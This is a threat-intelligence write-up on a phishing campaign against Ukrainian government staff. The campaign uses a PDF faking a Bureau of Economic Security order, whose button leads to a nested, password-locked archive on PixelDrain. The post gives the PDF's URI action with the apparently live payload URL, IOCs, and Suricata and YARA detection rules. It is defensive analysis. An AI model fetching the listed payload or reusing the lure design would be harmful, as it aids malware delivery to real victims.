A Fake Ukrainian Government Order, a PixelDrain Link, and a Matryoshka of Archives: Dissecting the BES Lure Campaign
TL;DR: A live phishing campaign targeting Ukrainian entities was caught using a PDF lure impersonating the Bureau of Economic Security of Ukraine (BES). The document -- a single PNG image dressed up as an official government order -- contains an AcroForm button that silently directs the victim's browser to a PixelDrain-hosted payload. That payload is a 26MB nested archive chain (ZIP > RAR > password-protected RAR with encrypted headers) designed to defeat every layer of automated scanning. The PDF has 0/76 AV detections on VirusTotal. The payload was still live at time of analysis, with only 2 downloads recorded. MalwareBazaar pivot analysis ties this sample to a broader campaign cluster exploiting CVE-2025-8088 (WinRAR), using LNK, HTML, and RAR lures across military and government themes -- overlapping with the UAC-0252 threat cluster tracked by CERT-UA. The final payload remains unknown: the innermost RAR uses encrypted headers and a password that was likely communicated in the phishing email body, which was not recovered.
The Lure That Looked Like Paperwork
If you work in Ukrainian government finance, you open PDFs from the Bureau of Economic Security. That is your job. And that is what makes this campaign effective.
The file arrives with a name engineered to look like bureaucratic routine: Elektronna_forma_Biuro_ekonomichnoi_bezpeky_Ukrainy_vid_11.03.2026_vkhid_1921755727.pdf. Translated: "Electronic form of the Bureau of Economic Security of Ukraine dated 11.03.2026, incoming no. 1921755727." It is the kind of filename that a government worker would open without a second thought.
Inside, the victim sees what appears to be Order No. 34, dated 23 February 2026, from the Bureau of Economic Security -- complete with the official BES logo, letterhead, contact details, and a blue "Download Form" button at the bottom. The Ukrainian text is natural, not machine-translated. The formatting mirrors real BES documents. Someone built this lure who knows how Ukrainian government correspondence looks.
But the entire document is a lie. It is a single PNG image (1098x1552 pixels) converted to PDF using PDF-XChange Editor. The "Download Form" button is not part of the image -- it is an AcroForm widget laid on top, wired to a URI action that opens the victim's browser to a PixelDrain download link.
No JavaScript. No macros. No exploit. Just a button and a URL.
How the Delivery Chain Works
[Phishing Email]
Suspected email delivery (original not recovered)
|
v
[Stage 1: PDF Lure]
Elektronna_forma_...vid_11.03.2026_vkhid_1921755727.pdf
Image-based fake BES order with AcroForm button
/A << /S /URI /URI (https://pixeldrain.com/api/file/ZdQa4vA7) >>
/FT /Btn /Subtype /Widget
|
v (victim clicks "Download Form")
[Stage 2: PixelDrain Payload]
hxxps://pixeldrain[.]com/api/file/ZdQa4vA7
Filename: Електронна форма Бюро економічної безпеки України №_3495.zip
26.2 MB ZIP archive
|
v
[Stage 3: First RAR Layer]
RAR5 (Solid, Locked)
26.2 MB
|
v
[Stage 4: Second RAR Layer]
RAR5 (Solid, Locked, Encrypted Headers)
Password-protected -- password not recovered
|
v
[UNKNOWN FINAL PAYLOAD]
The chain is deliberate. Each nesting layer defeats a different defensive control:
- The PDF bypasses email content filtering -- no macros, no JavaScript, no exploit code. Just a URI action on a form button, which most PDF scanners ignore.
- PixelDrain bypasses reputation-based URL filtering -- it is a legitimate Dutch file hosting service with a clean domain reputation.
- The outer ZIP bypasses file type restrictions that block RAR attachments directly.
- The first RAR adds another extraction step that automated sandboxes must handle correctly.
- The inner RAR with encrypted headers defeats everything. Password-protected archives with encrypted headers cannot be scanned by any gateway, sandbox, or AV engine without the password. And that password lives in the phishing email body, which the scanner never sees.
The PDF Under the Hood
The metadata tells a story about the operator:
| Field | Value | Significance |
|---|---|---|
| Creator Tool | PDF-XChange Editor 10.7.2.400 | Commercial editor, commonly pirated in CIS region |
| Producer | PDF-XChange Core API SDK (10.7.2.400) | SDK version matches -- not a cracked export |
| Creation Time | 2026-03-10T23:47:08+03:00 | Late night, UTC+3 timezone |
| Modification Time | 2026-03-10T23:47:38+03:00 | 30 seconds later -- quick edit |
| Original Title | 1.png | Document started as a screenshot |
| Document UUID | c3a0db3e-3824-4298-91ba-38af423e8244 | Unique tracking artifact |
| AcroForm Font | Helvetica-Bold | Button text styling |
| Button Label | Завантажити (Download) | Ukrainian language |
The UTC+3 timezone is the first attribution breadcrumb. Eastern European Time covers Ukraine, Moldova, Romania, Belarus, and western Russia. The document was created at 11:47 PM local time -- someone was working late on March 10, and the payload was uploaded to PixelDrain six hours earlier at 17:36 UTC. The 30-second gap between creation and modification times suggests the operator created the PDF from the PNG, immediately added the AcroForm button with the PixelDrain link, and saved.
The 1.png original title is telling. This was not a document built from scratch in a word processor. Someone took a screenshot or designed an image of a fake BES order, then wrapped it in a PDF with a clickable button overlaid. It is a template approach -- swap the image, update the button URL, and you have a new lure in under a minute.
PixelDrain: The Unwitting Accomplice
The payload URL points to PixelDrain's file API:
hxxps://pixeldrain[.]com/api/file/ZdQa4vA7
PixelDrain is a legitimate file hosting service based in the Netherlands. It is not malicious infrastructure -- it is abused infrastructure. The distinction matters for defenders: blocking pixeldrain.com entirely may cause collateral damage, but blocking this specific file endpoint is surgical and safe.
At the time of automated analysis, the payload was confirmed live through three independent verification methods:
- PDF stream decompression -- extracting the URL directly from the AcroForm action
- PixelDrain Info API -- querying
/api/file/ZdQa4vA7/inforeturned file metadata - HTTP HEAD request -- confirmed the file was downloadable with correct Content-Length
The file had been downloaded only twice at time of analysis. Either the campaign was extremely targeted (a handful of specific recipients), or it had just begun and was caught early.
| PixelDrain Metadata | Value |
|---|---|
| File ID | ZdQa4vA7 |
| Filename | Електронна форма Бюро економічної безпеки України №_3495.zip |
| Size | 26,244,456 bytes (26.2 MB) |
| Upload Date | 2026-03-10T17:36:34.505Z |
| Downloads | 2 |
| MIME Type | application/zip |
| Hosting IPs | 160[.]202[.]167[.]162-164 |
| ASN | AS137409 (GSL Networks / Keystone) |
The Matryoshka: Three Archives Deep
The 26.2MB ZIP downloaded from PixelDrain contains a RAR archive, which contains another RAR archive. The nesting is not accidental -- it is a well-documented evasion pattern used by Eastern European threat actors, particularly those targeting Ukraine.
| Layer | Type | SHA256 | Size | Protection |
|---|---|---|---|---|
| Outer | ZIP | 0f93906c5198a0cefa9671506c0042ec... | 26.2 MB | None |
| Inner 1 | RAR5 | 1c7c41c81951771b7f9af2491e9c898e... | 26.2 MB | Solid, Locked |
| Inner 2 | RAR5 | 9edd7dbcafdb8fe9ac1d6b92ac4cbd42... | 26.2 MB | Solid, Locked, Encrypted Headers |
The innermost RAR uses encrypted headers, which means you cannot even see the filenames inside without the password. This is a step beyond simple password protection -- it prevents any form of metadata-based detection. An email gateway scanning this archive chain would see: a ZIP containing a RAR containing... nothing it can read.
The password was not recovered during this investigation. It was almost certainly communicated in the body of the phishing email ("Use password: XXXX to open the form"), which was not available for analysis. This is a common pattern: split the credential from the payload so that no single artifact contains both.
The consistent 26.2 MB size across all three layers indicates minimal compression overhead -- the actual payload data is approximately the same size regardless of which container you measure.
What Was Found vs. What Was Known
| Aspect | Prior Public Reporting | This Investigation |
|---|---|---|
| Delivery format | UKR campaigns use LNK, RAR, HTML, HWP | PDF lure with AcroForm URI action (no JS/macros) |
| Hosting | Actor-controlled infrastructure or compromised sites | PixelDrain legitimate file hosting (abused) |
| Lure theme | Military supply, property reports, cooperation docs | Bureau of Economic Security financial reporting form |
| Archive evasion | Password-protected RAR | Triple-nested ZIP > RAR > encrypted-header RAR |
| CVE exploitation | CVE-2025-8088, CVE-2025-6218 in related samples | Unknown -- final payload not extracted |
| Attribution | UAC-0252 cluster (CERT-UA) | Tactical overlap via MalwareBazaar UKR tag pivot |
| AV detection | Varies | 0/76 on VirusTotal (completely undetected) |
| Malware families | Quakbot, RClone-Stealer-Mega in related UKR samples | Unknown -- encrypted payload not recovered |
| Operator timezone | Eastern Europe assumed | UTC+3 confirmed via PDF metadata |
| Tooling | Various | PDF-XChange Editor 10.7.2.400 (specific version fingerprint) |
The Broader Campaign: UAC-0252 and CVE-2025-8088
This PDF lure does not exist in isolation. A pivot on the UKR tag in MalwareBazaar reveals a coordinated campaign running since at least early March 2026, using multiple file types and exploitation techniques:
| Date | SHA256 (truncated) | Type | Tags/CVEs | Theme |
|---|---|---|---|---|
| 2026-03-11 | ce10df51... | ZIP | UKR | BES Ukraine form (this sample) |
| 2026-03-10 | edc242b4... | RAR | UKR, CVE-2025-8088 | Unknown |
| 2026-03-10 | 4394c347... | HTML | UKR | Unknown lure |
| 2026-03-06 | 14cfadb8... | LNK | UKR | Property report (Dopovid_maino) |
| 2026-03-05 | 8150b2b3... | RAR | UKR, CVE-2025-6218, CVE-2025-8088 | Military supply unit |
| 2026-03-03 | ba149847... | RAR | UKR, UAC-0252, CVE-2025-6218, CVE-2025-8088 | Unknown |
| 2026-03-03 | 27d7a398... | ZIP | UKR, Quakbot, RClone-Stealer-Mega | Algeria-Ukraine cooperation |
Three observations stand out:
First, the operator is versatile. PDF, RAR, LNK, HTML -- four different file types in eight days. This is not a one-trick actor running the same playbook. They are rotating delivery mechanisms, likely testing which formats achieve the best open rates against specific targets.
Second, CVE-2025-8088 (a WinRAR vulnerability) appears in three related samples from March 3-10. The password-protected RAR in our sample may be designed to exploit this same vulnerability during extraction. Without the password, we cannot confirm this -- but the pattern is suggestive.
Third, the March 3 sample tagged UAC-0252 provides a tentative attribution anchor. UAC-0252 is a CERT-UA designation for a Russian-nexus threat cluster targeting Ukrainian government and military organizations. The shared UKR tagging, overlapping timeframe, and consistent government/military lure themes make this overlap worth tracking -- but it is not a confirmed attribution.
Threat Actor Profile
What we know:
- Timezone: UTC+3 (confirmed via PDF creation timestamp)
- Language: Native or near-native Ukrainian (natural phrasing in lure, correct government terminology)
- Government knowledge: Accurate impersonation of BES document format, including logo, letterhead, and contact details
- OPSEC awareness: Image-based PDF (no extractable text for content filters), nested encrypted archives, legitimate hosting infrastructure
- Tooling: PDF-XChange Editor 10.7.2.400 -- a commercial Windows PDF editor commonly used in Eastern Europe
What we do not know:
- Final payload: The encrypted RAR's contents remain unknown
- Email vector: The original phishing email was not recovered
- Target list: Only 2 downloads recorded, but scope could be wider
- Direct link to UAC-0252: Overlap is tactical, not technical
Attribution assessment:
LOW confidence link to UAC-0252 / Russian-nexus operations. The assessment is based on shared MalwareBazaar UKR tagging, consistent targeting themes, and temporal overlap -- not on shared infrastructure, code, or C2. The UTC+3 timezone is consistent with both Ukrainian and Russian operators.
Detection
Email Gateway
Block or quarantine PDF attachments that contain:
/S /URI /URIactions pointing to file hosting services (PixelDrain, GoFile, AnonFiles, Mega, MediaFire)- AcroForm button widgets (
/FT /Btn) with external URI actions - Ukrainian-language filenames with government entity references
Network
Deploy the following Suricata signatures to detect payload delivery:
# Detect PixelDrain API file downloads (broad)
alert http $HOME_NET any -> $EXTERNAL_NET any (
msg:"BREAKGLASS UKR-Lure PixelDrain Payload Download";
flow:established,to_server;
http.host; content:"pixeldrain.com";
http.uri; content:"/api/file/"; startswith;
classtype:trojan-activity;
sid:2026031101; rev:1;
)
# Detect specific campaign payload (surgical)
alert http $HOME_NET any -> $EXTERNAL_NET any (
msg:"BREAKGLASS UKR-Lure PixelDrain Specific Payload ZdQa4vA7";
flow:established,to_server;
http.host; content:"pixeldrain.com";
http.uri; content:"/api/file/ZdQa4vA7";
classtype:trojan-activity;
sid:2026031102; rev:1;
priority:1;
)
# Detect PDF files containing PixelDrain links in transit
alert file any any -> any any (
msg:"BREAKGLASS UKR-Lure PDF with PixelDrain Link";
filemagic:"PDF document";
file.data; content:"pixeldrain.com/api/file/";
classtype:trojan-activity;
sid:2026031105; rev:1;
)
Endpoint (YARA)
Deploy the following rule to email gateways and file scanning infrastructure:
rule UKR_Lure_BES_PDF_Stage1
{
meta:
description = "Detects Ukrainian BES-themed PDF lure with PixelDrain payload link"
author = "Breakglass Intelligence"
date = "2026-03-11"
hash = "8a4e0ff205d2799ee16e2df1106cb1269be5d4ec131f38560e7e09439a068319"
severity = "HIGH"
strings:
$pdf_header = "%PDF-"
$pixeldrain_uri = /https?:\/\/pixeldrain\.com\/api\/file\/[A-Za-z0-9_-]{6,12}/ ascii wide
$pdfxchange = "PDF-XChange" ascii wide
$acroform = "/AcroForm" ascii
$uri_action = "/S /URI /URI" ascii
$btn_widget = "/FT /Btn" ascii
condition:
$pdf_header at 0 and
$pixeldrain_uri and
($acroform and $uri_action and $btn_widget)
}
Hunting Queries
For organizations with EDR telemetry, hunt for:
- PDF files opened from email clients where the default browser subsequently navigates to
pixeldrain.com/api/file/* - Large ZIP downloads (>25MB) from PixelDrain containing nested RAR archives
- RAR extraction failures (encrypted headers, password prompts) following PDF file opens
MITRE ATT&CK Mapping
| Tactic | Technique | ID | Implementation |
|---|---|---|---|
| Initial Access | Spearphishing Attachment | T1566.001 | PDF lure delivered via email |
| Execution | User Execution: Malicious File | T1204.002 | Victim clicks "Download Form" button |
| Command and Control | Ingress Tool Transfer | T1105 | Payload downloaded from PixelDrain |
| Defense Evasion | Obfuscated Files or Information | T1027 | Nested archive chain (ZIP > RAR > RAR) |
| Defense Evasion | Masquerading | T1036 | Fake BES government document |
| Defense Evasion | Encrypted/Encoded File | T1027.013 | Password-protected RAR with encrypted headers |
Indicators of Compromise
File Hashes
| Artifact | SHA256 | MD5 |
|---|---|---|
| PDF Lure | 8a4e0ff205d2799ee16e2df1106cb1269be5d4ec131f38560e7e09439a068319 | 836ea9e604640b5eaca414514f4962ce |
| MalwareBazaar ZIP | ce10df51bf1eda48756df2c7c1962d2486d2e25e23695a6f98a82e32281df347 | 9115df1d2f2913ebf21788f6f9469251 |
| Stage 2 ZIP (PixelDrain) | 0f93906c5198a0cefa9671506c0042ec469f55582b048b55dbeaa7932ccd42a3 | -- |
| Stage 2 RAR (layer 1) | 1c7c41c81951771b7f9af2491e9c898eec5e0465862196551865e8cfd702c037 | -- |
| Stage 2 RAR (encrypted) | 9edd7dbcafdb8fe9ac1d6b92ac4cbd42e98d3237f9d500453bedd1418386483e | -- |
Network Indicators
| Indicator | Type | Context |
|---|---|---|
hxxps://pixeldrain[.]com/api/file/ZdQa4vA7 | URL | Payload download (CONFIRMED live) |
pixeldrain[.]com | Domain | Legitimate hosting, abused for delivery |
160[.]202[.]167[.]162 | IP | PixelDrain infrastructure (legitimate) |
160[.]202[.]167[.]163 | IP | PixelDrain infrastructure (legitimate) |
160[.]202[.]167[.]164 | IP | PixelDrain infrastructure (legitimate) |
Metadata Indicators
| Indicator | Type | Confidence |
|---|---|---|
| PDF-XChange Editor 10.7.2.400 | Creator Tool | PROBABLE (operator fingerprint) |
| PDF-XChange Core API SDK (10.7.2.400) | Producer | PROBABLE |
uuid:c3a0db3e-3824-4298-91ba-38af423e8244 | Document UUID | CONFIRMED |
uuid:a58f2a83-ab65-463c-a016-3e8e70495470 | Instance UUID | CONFIRMED |
1.png | Original Title | CONFIRMED (source image) |
Related Campaign Hashes
| SHA256 | Type | Date | Tags |
|---|---|---|---|
edc242b4... | RAR | 2026-03-10 | UKR, CVE-2025-8088 |
4394c347... | HTML | 2026-03-10 | UKR |
14cfadb8... | LNK | 2026-03-06 | UKR |
8150b2b3... | RAR | 2026-03-05 | UKR, CVE-2025-6218, CVE-2025-8088 |
ba149847... | RAR | 2026-03-03 | UKR, UAC-0252, CVE-2025-6218, CVE-2025-8088 |
27d7a398... | ZIP | 2026-03-03 | UKR, Quakbot, RClone-Stealer-Mega |
What We Could Not Determine
This investigation has real gaps, and they matter:
- The final payload is unknown. The password-protected RAR with encrypted headers could not be extracted. The password was delivered in the phishing email, which was not recovered. This means we cannot confirm the malware family, C2 infrastructure, or post-exploitation behavior.
- No behavioral analysis. VirusTotal sandbox returned no data -- the sample was too fresh. Dynamic analysis platforms could not process the encrypted archive without the password.
- No email headers. The original phishing email was not available, so we cannot determine the sending infrastructure, spoofed headers, or recipient list.
- CVE-2025-8088 exploitation is unconfirmed. Related campaign samples exploit this WinRAR vulnerability, and the nested RAR structure is consistent with that technique, but we cannot confirm it without extracting the final payload.
- Certificate Transparency data was unavailable. crt.sh returned 502 errors during analysis.
These gaps should inform how you prioritize: the IOCs for the PDF lure and PixelDrain delivery are high-confidence and actionable today. The campaign-level attribution to UAC-0252 is speculative and should be treated as a hypothesis to monitor, not a conclusion to act on.
Recommended Actions
Immediate:
- Block
hxxps://pixeldrain[.]com/api/file/ZdQa4vA7at web proxy / firewall - Deploy hash-based blocking for all five SHA256 values in the IOC table
- Report file ID
ZdQa4vA7to PixelDrain abuse for takedown - Deploy YARA and Suricata rules to email gateways and network IDS
Short-term:
5. Hunt for PDF files containing pixeldrain.com/api/file/ strings across email logs and endpoint telemetry
6. Monitor MalwareBazaar UKR tag for new samples from this campaign cluster
7. Track CVE-2025-8088 exploitation in incoming RAR files
8. Brief CERT-UA if this campaign is not already in their tracking
Strategic: 9. Evaluate policies for PDF files with AcroForm URI actions -- these bypass most content scanning 10. Consider restricting or monitoring access to file hosting services (PixelDrain, GoFile, etc.) commonly abused for payload delivery 11. Implement nested archive extraction limits in email gateways -- if an attachment contains more than two archive layers, quarantine it
Published by Breakglass Intelligence. Investigation conducted 2026-03-11. A fake government order. A file hosting link. Three layers of archives. Zero AV detections. And a payload we still cannot see. Classification: TLP:CLEAR